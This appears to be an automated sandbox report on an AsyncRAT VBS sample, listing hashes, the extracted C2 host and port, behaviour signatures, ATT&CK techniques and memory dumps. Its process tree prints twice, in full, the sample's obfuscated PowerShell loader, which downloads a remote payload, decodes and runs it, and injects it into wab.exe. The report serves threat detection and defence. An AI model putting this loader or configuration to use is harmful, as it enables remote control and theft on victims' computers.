asyncrat | ca073831a8671f0d5cc9f0149c43b58be3d92b4a7b5a39235b1547acd2e5de28

General

Target

ca073831a8671f0d5cc9f0149c43b58be3d92b4a7b5a39235b1547acd2e5de28.vbs
Size

897KB
MD5

5964d98cf06acef50055252add1acc74
SHA1

4fc5206d256394d7e6c9b3fb648bad6e0f714058
SHA256

ca073831a8671f0d5cc9f0149c43b58be3d92b4a7b5a39235b1547acd2e5de28
SHA512

9477633a7073c2753c1df75b6321d8d1b43158c83607e5f0fab69463fb67602eaae708b0c27c0087185cd46c90f9024ac4ded03a38cf91c8154cc771c9a3d29a
SSDEEP

12288:qzTzUyR7hSRac+qkLmttaGgMskgqoiMHsp9NH:UXh+k+taGKqoJONH

Score

10^/10

asyncrat default rat

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

C2

dhhj.duckdns.org:8797

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Blocklisted process makes network request 5 IoCs

Processes:

powershell.exe

flow pid process

17 4108 powershell.exe
27 4108 powershell.exe
30 4108 powershell.exe
32 4108 powershell.exe
38 4108 powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation WScript.exe
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

3256 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

4628 powershell.exe
3256 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 4628 set thread context of 3256 4628 powershell.exe wab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exe

pid process

4108 powershell.exe
4108 powershell.exe
4628 powershell.exe
4628 powershell.exe
4628 powershell.exe
4628 powershell.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

4628 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 4108 powershell.exe
Token: SeDebugPrivilege 4628 powershell.exe
Token: SeDebugPrivilege 3256 wab.exe

flow	pid	process
17	4108	powershell.exe
27	4108	powershell.exe
30	4108	powershell.exe
32	4108	powershell.exe
38	4108	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	WScript.exe

pid	process
3256	wab.exe

pid	process
4628	powershell.exe
3256	wab.exe

description	pid	process	target process
PID 4628 set thread context of 3256	4628	powershell.exe	wab.exe

pid	process
4108	powershell.exe
4108	powershell.exe
4628	powershell.exe
4628	powershell.exe
4628	powershell.exe
4628	powershell.exe

pid	process
4628	powershell.exe

description	pid	process
Token: SeDebugPrivilege	4108	powershell.exe
Token: SeDebugPrivilege	4628	powershell.exe
Token: SeDebugPrivilege	3256	wab.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 3456 wrote to memory of 4108	3456	WScript.exe	powershell.exe
PID 3456 wrote to memory of 4108	3456	WScript.exe	powershell.exe
PID 4108 wrote to memory of 2860	4108	powershell.exe	cmd.exe
PID 4108 wrote to memory of 2860	4108	powershell.exe	cmd.exe
PID 4108 wrote to memory of 4628	4108	powershell.exe	powershell.exe
PID 4108 wrote to memory of 4628	4108	powershell.exe	powershell.exe
PID 4108 wrote to memory of 4628	4108	powershell.exe	powershell.exe
PID 4628 wrote to memory of 4816	4628	powershell.exe	cmd.exe
PID 4628 wrote to memory of 4816	4628	powershell.exe	cmd.exe
PID 4628 wrote to memory of 4816	4628	powershell.exe	cmd.exe
PID 4628 wrote to memory of 3256	4628	powershell.exe	wab.exe
PID 4628 wrote to memory of 3256	4628	powershell.exe	wab.exe
PID 4628 wrote to memory of 3256	4628	powershell.exe	wab.exe
PID 4628 wrote to memory of 3256	4628	powershell.exe	wab.exe
PID 4628 wrote to memory of 3256	4628	powershell.exe	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ca073831a8671f0d5cc9f0149c43b58be3d92b4a7b5a39235b1547acd2e5de28.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3456
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Retrofleksion = 1;$Bambustppets='Sub';$Bambustppets+='strin';$Bambustppets+='g';Function Konomigruppens($Morbror){$retablerings=$Morbror.Length-$Retrofleksion;For($Upaaagtet=5;$Upaaagtet -lt $retablerings;$Upaaagtet+=6){$ubehersket+=$Morbror.$Bambustppets.Invoke( $Upaaagtet, $Retrofleksion);}$ubehersket;}function Spinatens($Solskinsvejrets){& ($Vaivode) ($Solskinsvejrets);}$Logometrical=Konomigruppens ' OutpM SawmoBrug.zHemo,i Pe hl oncelLy phaHyper/Turis5S.aan. So.i0Assem Unexp(Ta reWforduiSmaasnToprodInsatoU.ennwAfva.s Per, PropNIde,lT Tilr Velpl1Bonus0Af.an. Ar,e0Sekre;Angst TelefWPseudiF rmin i,gr6Syges4Spino;Ritr, Amtslx Sel 6 Mass4 Bili;Ath n Ref.rTrykkvNon.u: Prci1Pro e2tra.d1ramle.Marmo0Miljf) sans DiantGUsseleFlyt.cBraktkHalvdoS,yre/Brems2Darkh0Lob,y1Recre0Eg,et0Smerg1Tidsh0 Pheo1Amatr synteFNorm,i LaanrHydraeFlskefUndlioLogfix Skem/W.bst1 Li,i2Unlik1Frihe.Demen0Inequ ';$Shroffs150=Konomigruppens 'UngeoU Snoos LgemeCaffarUfors-MegapAEnspogapocaeFortrnBloketAfste ';$Hreapparats=Konomigruppens 'DaltohGu.ertUndertReserpFu.ktsD.tai:Atry./alvil/Permaw SurpwC tupwRutte.D,adcs NanieArthrnBeefidbukkes.tyrepPorteapr.coc Feu e ,nti.EjakucNonproS.andm.okol/U.mopp,nkvir Kapio Maal/AnimedJimigl Elox/Rmn,ngLof s2R,gnsj ExtrsKo.ve9Udrev1Fuldm ';$Valenser=Konomigruppens 'O.dre>,nees ';$Vaivode=Konomigruppens 'FluidiEle.ieGratux inte ';$Annulusesosaurus='Fletch';$Annuluses = Konomigruppens 'UdmuneNo,thcFeu.ahsoftwoGrunt Horo%CobolaCystopSer ip VegedFrskhaA.okatDishuaUninw%Post,\Brak k ideaStocknTrocatAleatoMultinForesn S.ileHardwmS mimee,tusn ka,stSkke,eBeanbrFremmsK beh.MisprR.emmaeWo,llp Anre O,rin&Klist& Wild ForefeG,mnacRecr.hovergo We.t PhilatPanto ';Spinatens (Konomigruppens 'Psykt$ MoragLoddelProgroR,ddeb KresaForpalallay:BackhT Parie IntekMikadsFlount BlaalStikksopslinRampoiEp.cen PromgK,ple=S lin(Slidlc nhabmAfskrdAsm,n Er,th/BanagcUdskl Rente$ udlAGodtfncoumanS.ovrulogoclUnex.uRynkesHaulseCop.os H,em) Croj ');Spinatens (Konomigruppens 'Abio.$Villag Moskl,aguno ,rkebSkrifaEscallDibst:ForetaOst ofSteinbUnsaplMygaleDatamgSeque=,pora$ DataHB blirDksskeUngr,aTilslpUnferpHy,eraDiffrrGalopa Pe ftbrneps ett. wan.sTranspD.odelBa,kkiSubert Butt(Bevge$AsterVrelataW.nnilRovdrePyramn teiss Bacte ro,lrSeism) O,ra ');$Hreapparats=$afbleg[0];$Dumpingprisen= (Konomigruppens 'Hogma$Trykng ,ngilBrndtoUgr,sbUnproa.rzrulSkint:KerneB E fliHijacdReprorGldelabeboegOrbicy In.edKn,cke KrlirDi,kinMinuteHjdessAfdel=,rassNDollyeFoliewPluvi- .iltOBortlbHovedjslagte stuecMod,rt .nne G.undSNonsoy .imbsUnregtddsaaeT.riamArist.Er ndNKej,eeAfslatAndro.knsliWS.atie TheebInd.kC .ovel,igroiTornaeRevelnToldat');$Dumpingprisen+=$Tekstlsning[1];Spinatens ($Dumpingprisen);Spinatens (Konomigruppens '.ppre$.alteBS.arbiban ld athrr DebaaAflirg ormaytriumdSuspee WitnrOver.nAutumeRegnssExhib. WaldHC.iffeAporoapreacd romueCo.terMonatsB,gen[Urneg$DenudS,jernhFlugtr SkivoFlytnfprogrfDrypnsSubje1Myrme5 Lini0 Kari]Anti,=So.od$DukkeL SaucoUnexpgImpuloSaa rmOpinieFred,tPoul.rEburniRaavacJe,osa KramlGenne ');$Lokalernes=Konomigruppens 'Udelt$VerkrBgusheiDy,frd NaturHoppeaVi ylgTillgyWhaledcylineFugtpr j stnSkul e BoxbsTrivi.TermiDLakrioopkalwGravinTjenel AffaoScholaFredsdC.esuFRu,oliH,logl RecaeUnnam(Bugfi$CentrHForsvrEnokpeSk.gga P,eapClavipTyskeaHawairAl,ehaSub etLynnesExcit,They $DokumEUnloafNannytStauneSvensrPach bVildne JesytArranaDaglilSignaiNomadnFejlrgDeste)Lufti ';$Efterbetaling=$Tekstlsning[0];Spinatens (Konomigruppens 'Fl ri$Ro lugB.omslStre oforkvbSaddlaSemillSmalf:TailsPSkylde,rydnnStifftth,mbaTyl ecreappa,statpCutlas Lousu ssul Sp.raTel urVarte=Acicu(PotamTHone eTich s Adeqt K gg-Bro.zPp lycaFinistKlipphEngob Omvis$Sam eEFrikafpube tSis,fe GennrS lksbFr gteS,rtkt LambatumbllEnestiTjr hnwoodwgToldp),maln ');while (!$Pentacapsular) {Spinatens (Konomigruppens 'Indf.$.limegVa.dilRegenoRovf.bO.vekaL,erul Beha:hyletOLat,evV.rdeeInforrClaritNosite centgTotipnFagsse AugunF.rvrdslgtseMlleh=Sexce$RoebetEpisirStorpuStv,oeKolon ') ;Spinatens $Lokalernes;Spinatens (Konomigruppens 'HagleSKar.ot.lanbaSubrirB.ttetly ch-Or.itSSplitl.agabeBieste cacap V.gi Flosk4 Tils ');Spinatens (Konomigruppens ' fid$Ca frgUnprelC,oiroordr,b Ex.uametrol,undk:CausaPW,dineise kn timetAdopta CorocBe reaIsomopBorges rmolu TabulSem,da ransrH,per=Bered(DagvoTUdplyeSkil.sScle tEnqui- Fr,sPPartiaUl.kktBaareh Rif, Macar$FlaskELnninfUnprot OrcheBruisr.illebA.tireSendetkotypaFunktlTuitiiBeachnCuritgSikke)Fortr ') ;Spinatens (Konomigruppens ' Or,n$Bal agK.arllBivogoFre.ebForgraTota lBjerg:Stor.P oriaPaakrtPr,syeRe.itn serotKo,cee Nonpr undanBaldrePri isWinal=Natur$Wa.legTaxwil .dlboCoa fb C rcaLrredlGudmo:ImbibCVenuloB usemkolonpFal.suPhototFestmeForesrTin.ep icisrEndolo ,ukkb.nderl ProveUpticmNonpreAntihrOutdwnSyvaaeGen,eshyp,z+Indsk+ fspn%Anony$Boltsa Fastf ConvbNo prlKvivaeSheikg.nnei.EtikecEfteroBreasuEugennBacketAntia ') ;$Hreapparats=$afbleg[$Patenternes];}$Personalhistoriers=309626;$Motiverings59=27930;Spinatens (Konomigruppens ' Sk,n$Con,igVirusl Munio yrobbAfproaKeefelE ico:BagklRSnowbeSchizt GunasTrooskForr rMast iClashvFlikfnL kkai,alernBarbagPiehos IlanrSttedeConsifBagf.o Ch.mrReunim I.pr Avls.=S ole VoldGUtryge B tttUpaal-,vertCRidgiom,tapn Uti tPilafeGlucon PaagtGataa Robot$SpndsEFattefHeltitOverreBlndrr d.nsbBasipeNgl.stRho baGrowelFru,tiBehagnTelexgGreen ');Spinatens (Konomigruppens ' Glis$Tor.eg.ensil PreaoMi,jab .ernaJaghilVi,er:DefekSUdspea Vesib BagwbHulkoaSchizt Pa.aiBrys c BeataAfg,nlChima Oakla= Hybr aive[stiliSNicolyByggesStamptContoeMortamSamme.evighCDev lo MuldnLeverv ,edbe ForerRumantSkate].eade: Heir:Cy.laFVidvir.xpenostivnmlaundB.udgea Run,sS.raseBuckt6Etymo4Jule S DeentApororInteriKriminMisfigAfstn(S ave$Cam zRCoasse spectAmylisCruzik ,estrPurpuiMoi tvCaustn Linci.ooidnObtrugFaradsCacatr T,abeBars fPaatroSantarBr,bemInkam)Penge ');Spinatens (Konomigruppens ' Bort$ChrisgKunstlUdvi oPremibFerieaSkulelslack:BallaFUdlevoCigarr.altua.lmuer skomg KonveMakullHftetsOrgane Elodr Sk.anuncone MaxisCoass2Over,4Paak 1 uksu Runni=.crit Vink[S.vanSAwastySupersDecentTrib,eslgtrmPneum. ecimT VidteRiv lx cirktOutre.Si,naESwagbnUng lcRetsfoAreoldMelaniMorianDysu.g Resc]Rosew:Archi: Ly.tA OverS A.coCP.ickIKonteIDesti.NutgrGDiseneFab,itVe,ruSEctr,tPitaurDrifti.redenPlancg Back( Kryd$QuinqSkrigsa CarbbNyhedb.emeda PolotPe,tliBrne cUnelea Fo,bl Hapu) Hy.o ');Spinatens (Konomigruppens 'Melan$SociagRatifl AfwioR.nkeb VandaF dhvl Plai: MyceU B,sknFilkowItacoaStabetFladecSwifth StokfKlenau avel rupinVanniekon.rsOttetsafsme= den$ SsonFOpfrso FerrrEtwita YderrFev rgDys.deCataclFlammsFerrie EpisrSej in arreUnmetsTrian2Unass4Tegne1Bison.DroitsSoneduMiracbBuksesawanhtProhyrSt,rmiTilbjnHurragBrugb(Rnneb$ ekrePGartnes,licrPyrogs SamtoMas rnVisc aPlanslRefurhLe.meiO,stdsErecht,odkeoUnderrMatchiSubdue DelerGr sbsPalma,Runds$Evig,MVandsoSka,ntExtusiFunktvPanegeSlikkrtra.siUretmnGtevigPostvsinstr5 Afla9Sandk)Floor ');Spinatens $Unwatchfulness;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4108
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\kantonnementers.Rep && echo t"
    3⤵
    PID:2860
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Retrofleksion = 1;$Bambustppets='Sub';$Bambustppets+='strin';$Bambustppets+='g';Function Konomigruppens($Morbror){$retablerings=$Morbror.Length-$Retrofleksion;For($Upaaagtet=5;$Upaaagtet -lt $retablerings;$Upaaagtet+=6){$ubehersket+=$Morbror.$Bambustppets.Invoke( $Upaaagtet, $Retrofleksion);}$ubehersket;}function Spinatens($Solskinsvejrets){& ($Vaivode) ($Solskinsvejrets);}$Logometrical=Konomigruppens ' OutpM SawmoBrug.zHemo,i Pe hl oncelLy phaHyper/Turis5S.aan. So.i0Assem Unexp(Ta reWforduiSmaasnToprodInsatoU.ennwAfva.s Per, PropNIde,lT Tilr Velpl1Bonus0Af.an. Ar,e0Sekre;Angst TelefWPseudiF rmin i,gr6Syges4Spino;Ritr, Amtslx Sel 6 Mass4 Bili;Ath n Ref.rTrykkvNon.u: Prci1Pro e2tra.d1ramle.Marmo0Miljf) sans DiantGUsseleFlyt.cBraktkHalvdoS,yre/Brems2Darkh0Lob,y1Recre0Eg,et0Smerg1Tidsh0 Pheo1Amatr synteFNorm,i LaanrHydraeFlskefUndlioLogfix Skem/W.bst1 Li,i2Unlik1Frihe.Demen0Inequ ';$Shroffs150=Konomigruppens 'UngeoU Snoos LgemeCaffarUfors-MegapAEnspogapocaeFortrnBloketAfste ';$Hreapparats=Konomigruppens 'DaltohGu.ertUndertReserpFu.ktsD.tai:Atry./alvil/Permaw SurpwC tupwRutte.D,adcs NanieArthrnBeefidbukkes.tyrepPorteapr.coc Feu e ,nti.EjakucNonproS.andm.okol/U.mopp,nkvir Kapio Maal/AnimedJimigl Elox/Rmn,ngLof s2R,gnsj ExtrsKo.ve9Udrev1Fuldm ';$Valenser=Konomigruppens 'O.dre>,nees ';$Vaivode=Konomigruppens 'FluidiEle.ieGratux inte ';$Annulusesosaurus='Fletch';$Annuluses = Konomigruppens 'UdmuneNo,thcFeu.ahsoftwoGrunt Horo%CobolaCystopSer ip VegedFrskhaA.okatDishuaUninw%Post,\Brak k ideaStocknTrocatAleatoMultinForesn S.ileHardwmS mimee,tusn ka,stSkke,eBeanbrFremmsK beh.MisprR.emmaeWo,llp Anre O,rin&Klist& Wild ForefeG,mnacRecr.hovergo We.t PhilatPanto ';Spinatens (Konomigruppens 'Psykt$ MoragLoddelProgroR,ddeb KresaForpalallay:BackhT Parie IntekMikadsFlount BlaalStikksopslinRampoiEp.cen PromgK,ple=S lin(Slidlc nhabmAfskrdAsm,n Er,th/BanagcUdskl Rente$ udlAGodtfncoumanS.ovrulogoclUnex.uRynkesHaulseCop.os H,em) Croj ');Spinatens (Konomigruppens 'Abio.$Villag Moskl,aguno ,rkebSkrifaEscallDibst:ForetaOst ofSteinbUnsaplMygaleDatamgSeque=,pora$ DataHB blirDksskeUngr,aTilslpUnferpHy,eraDiffrrGalopa Pe ftbrneps ett. wan.sTranspD.odelBa,kkiSubert Butt(Bevge$AsterVrelataW.nnilRovdrePyramn teiss Bacte ro,lrSeism) O,ra ');$Hreapparats=$afbleg[0];$Dumpingprisen= (Konomigruppens 'Hogma$Trykng ,ngilBrndtoUgr,sbUnproa.rzrulSkint:KerneB E fliHijacdReprorGldelabeboegOrbicy In.edKn,cke KrlirDi,kinMinuteHjdessAfdel=,rassNDollyeFoliewPluvi- .iltOBortlbHovedjslagte stuecMod,rt .nne G.undSNonsoy .imbsUnregtddsaaeT.riamArist.Er ndNKej,eeAfslatAndro.knsliWS.atie TheebInd.kC .ovel,igroiTornaeRevelnToldat');$Dumpingprisen+=$Tekstlsning[1];Spinatens ($Dumpingprisen);Spinatens (Konomigruppens '.ppre$.alteBS.arbiban ld athrr DebaaAflirg ormaytriumdSuspee WitnrOver.nAutumeRegnssExhib. WaldHC.iffeAporoapreacd romueCo.terMonatsB,gen[Urneg$DenudS,jernhFlugtr SkivoFlytnfprogrfDrypnsSubje1Myrme5 Lini0 Kari]Anti,=So.od$DukkeL SaucoUnexpgImpuloSaa rmOpinieFred,tPoul.rEburniRaavacJe,osa KramlGenne ');$Lokalernes=Konomigruppens 'Udelt$VerkrBgusheiDy,frd NaturHoppeaVi ylgTillgyWhaledcylineFugtpr j stnSkul e BoxbsTrivi.TermiDLakrioopkalwGravinTjenel AffaoScholaFredsdC.esuFRu,oliH,logl RecaeUnnam(Bugfi$CentrHForsvrEnokpeSk.gga P,eapClavipTyskeaHawairAl,ehaSub etLynnesExcit,They $DokumEUnloafNannytStauneSvensrPach bVildne JesytArranaDaglilSignaiNomadnFejlrgDeste)Lufti ';$Efterbetaling=$Tekstlsning[0];Spinatens (Konomigruppens 'Fl ri$Ro lugB.omslStre oforkvbSaddlaSemillSmalf:TailsPSkylde,rydnnStifftth,mbaTyl ecreappa,statpCutlas Lousu ssul Sp.raTel urVarte=Acicu(PotamTHone eTich s Adeqt K gg-Bro.zPp lycaFinistKlipphEngob Omvis$Sam eEFrikafpube tSis,fe GennrS lksbFr gteS,rtkt LambatumbllEnestiTjr hnwoodwgToldp),maln ');while (!$Pentacapsular) {Spinatens (Konomigruppens 'Indf.$.limegVa.dilRegenoRovf.bO.vekaL,erul Beha:hyletOLat,evV.rdeeInforrClaritNosite centgTotipnFagsse AugunF.rvrdslgtseMlleh=Sexce$RoebetEpisirStorpuStv,oeKolon ') ;Spinatens $Lokalernes;Spinatens (Konomigruppens 'HagleSKar.ot.lanbaSubrirB.ttetly ch-Or.itSSplitl.agabeBieste cacap V.gi Flosk4 Tils ');Spinatens (Konomigruppens ' fid$Ca frgUnprelC,oiroordr,b Ex.uametrol,undk:CausaPW,dineise kn timetAdopta CorocBe reaIsomopBorges rmolu TabulSem,da ransrH,per=Bered(DagvoTUdplyeSkil.sScle tEnqui- Fr,sPPartiaUl.kktBaareh Rif, Macar$FlaskELnninfUnprot OrcheBruisr.illebA.tireSendetkotypaFunktlTuitiiBeachnCuritgSikke)Fortr ') ;Spinatens (Konomigruppens ' Or,n$Bal agK.arllBivogoFre.ebForgraTota lBjerg:Stor.P oriaPaakrtPr,syeRe.itn serotKo,cee Nonpr undanBaldrePri isWinal=Natur$Wa.legTaxwil .dlboCoa fb C rcaLrredlGudmo:ImbibCVenuloB usemkolonpFal.suPhototFestmeForesrTin.ep icisrEndolo ,ukkb.nderl ProveUpticmNonpreAntihrOutdwnSyvaaeGen,eshyp,z+Indsk+ fspn%Anony$Boltsa Fastf ConvbNo prlKvivaeSheikg.nnei.EtikecEfteroBreasuEugennBacketAntia ') ;$Hreapparats=$afbleg[$Patenternes];}$Personalhistoriers=309626;$Motiverings59=27930;Spinatens (Konomigruppens ' Sk,n$Con,igVirusl Munio yrobbAfproaKeefelE ico:BagklRSnowbeSchizt GunasTrooskForr rMast iClashvFlikfnL kkai,alernBarbagPiehos IlanrSttedeConsifBagf.o Ch.mrReunim I.pr Avls.=S ole VoldGUtryge B tttUpaal-,vertCRidgiom,tapn Uti tPilafeGlucon PaagtGataa Robot$SpndsEFattefHeltitOverreBlndrr d.nsbBasipeNgl.stRho baGrowelFru,tiBehagnTelexgGreen ');Spinatens (Konomigruppens ' Glis$Tor.eg.ensil PreaoMi,jab .ernaJaghilVi,er:DefekSUdspea Vesib BagwbHulkoaSchizt Pa.aiBrys c BeataAfg,nlChima Oakla= Hybr aive[stiliSNicolyByggesStamptContoeMortamSamme.evighCDev lo MuldnLeverv ,edbe ForerRumantSkate].eade: Heir:Cy.laFVidvir.xpenostivnmlaundB.udgea Run,sS.raseBuckt6Etymo4Jule S DeentApororInteriKriminMisfigAfstn(S ave$Cam zRCoasse spectAmylisCruzik ,estrPurpuiMoi tvCaustn Linci.ooidnObtrugFaradsCacatr T,abeBars fPaatroSantarBr,bemInkam)Penge ');Spinatens (Konomigruppens ' Bort$ChrisgKunstlUdvi oPremibFerieaSkulelslack:BallaFUdlevoCigarr.altua.lmuer skomg KonveMakullHftetsOrgane Elodr Sk.anuncone MaxisCoass2Over,4Paak 1 uksu Runni=.crit Vink[S.vanSAwastySupersDecentTrib,eslgtrmPneum. ecimT VidteRiv lx cirktOutre.Si,naESwagbnUng lcRetsfoAreoldMelaniMorianDysu.g Resc]Rosew:Archi: Ly.tA OverS A.coCP.ickIKonteIDesti.NutgrGDiseneFab,itVe,ruSEctr,tPitaurDrifti.redenPlancg Back( Kryd$QuinqSkrigsa CarbbNyhedb.emeda PolotPe,tliBrne cUnelea Fo,bl Hapu) Hy.o ');Spinatens (Konomigruppens 'Melan$SociagRatifl AfwioR.nkeb VandaF dhvl Plai: MyceU B,sknFilkowItacoaStabetFladecSwifth StokfKlenau avel rupinVanniekon.rsOttetsafsme= den$ SsonFOpfrso FerrrEtwita YderrFev rgDys.deCataclFlammsFerrie EpisrSej in arreUnmetsTrian2Unass4Tegne1Bison.DroitsSoneduMiracbBuksesawanhtProhyrSt,rmiTilbjnHurragBrugb(Rnneb$ ekrePGartnes,licrPyrogs SamtoMas rnVisc aPlanslRefurhLe.meiO,stdsErecht,odkeoUnderrMatchiSubdue DelerGr sbsPalma,Runds$Evig,MVandsoSka,ntExtusiFunktvPanegeSlikkrtra.siUretmnGtevigPostvsinstr5 Afla9Sandk)Floor ');Spinatens $Unwatchfulness;"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4628
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\kantonnementers.Rep && echo t"
      4⤵
      PID:4816
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of AdjustPrivilegeToken
      PID:3256

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l00soabg.yo5.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\kantonnementers.Rep

Filesize
439KB

MD5
54cf091a3bc7cf004b14df5a70f13d1e

SHA1
67a132607bb94fccb4024b97718b0bd41d7004ca

SHA256
b9bde21759f81a0ffb7ebf57b131a553e39af00af68fc933c18ced6e0dd89d69

SHA512
651957938fcfe6a627d6b55b521b879b2eb8ebf7a84a91025fa444c14940259ac5ed7ac0a03d9daec845531b4cac87e6709c2266919eebdbb3a292045af21a6c

Download Submit
memory/3256-64-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/3256-65-0x0000000000A00000-0x0000000000A12000-memory.dmp

Filesize
72KB

Download
memory/3256-70-0x0000000021940000-0x00000000219DC000-memory.dmp

Filesize
624KB

Download
memory/4108-16-0x00007FFA837A0000-0x00007FFA84261000-memory.dmp

Filesize
10.8MB

Download
memory/4108-15-0x00007FFA837A3000-0x00007FFA837A5000-memory.dmp

Filesize
8KB

Download
memory/4108-17-0x00007FFA837A0000-0x00007FFA84261000-memory.dmp

Filesize
10.8MB

Download
memory/4108-12-0x00007FFA837A0000-0x00007FFA84261000-memory.dmp

Filesize
10.8MB

Download
memory/4108-68-0x00007FFA837A0000-0x00007FFA84261000-memory.dmp

Filesize
10.8MB

Download
memory/4108-11-0x00007FFA837A0000-0x00007FFA84261000-memory.dmp

Filesize
10.8MB

Download
memory/4108-1-0x00000203AB580000-0x00000203AB5A2000-memory.dmp

Filesize
136KB

Download
memory/4108-0-0x00007FFA837A3000-0x00007FFA837A5000-memory.dmp

Filesize
8KB

Download
memory/4628-28-0x00000000059F0000-0x0000000005A56000-memory.dmp

Filesize
408KB

Download
memory/4628-45-0x00000000084A0000-0x0000000008A44000-memory.dmp

Filesize
5.6MB

Download
memory/4628-40-0x0000000006060000-0x00000000060AC000-memory.dmp

Filesize
304KB

Download
memory/4628-41-0x0000000007870000-0x0000000007EEA000-memory.dmp

Filesize
6.5MB

Download
memory/4628-42-0x00000000065C0000-0x00000000065DA000-memory.dmp

Filesize
104KB

Download
memory/4628-44-0x0000000007260000-0x0000000007282000-memory.dmp

Filesize
136KB

Download
memory/4628-43-0x00000000072D0000-0x0000000007366000-memory.dmp

Filesize
600KB

Download
memory/4628-39-0x0000000006030000-0x000000000604E000-memory.dmp

Filesize
120KB

Download
memory/4628-38-0x0000000005A60000-0x0000000005DB4000-memory.dmp

Filesize
3.3MB

Download
memory/4628-47-0x0000000008A50000-0x000000000A686000-memory.dmp

Filesize
28.2MB

Download
memory/4628-27-0x0000000005850000-0x00000000058B6000-memory.dmp

Filesize
408KB

Download
memory/4628-26-0x00000000057B0000-0x00000000057D2000-memory.dmp

Filesize
136KB

Download
memory/4628-25-0x0000000005100000-0x0000000005728000-memory.dmp

Filesize
6.2MB

Download
memory/4628-24-0x0000000004A90000-0x0000000004AC6000-memory.dmp

Filesize
216KB

Download

Analysis

Sharing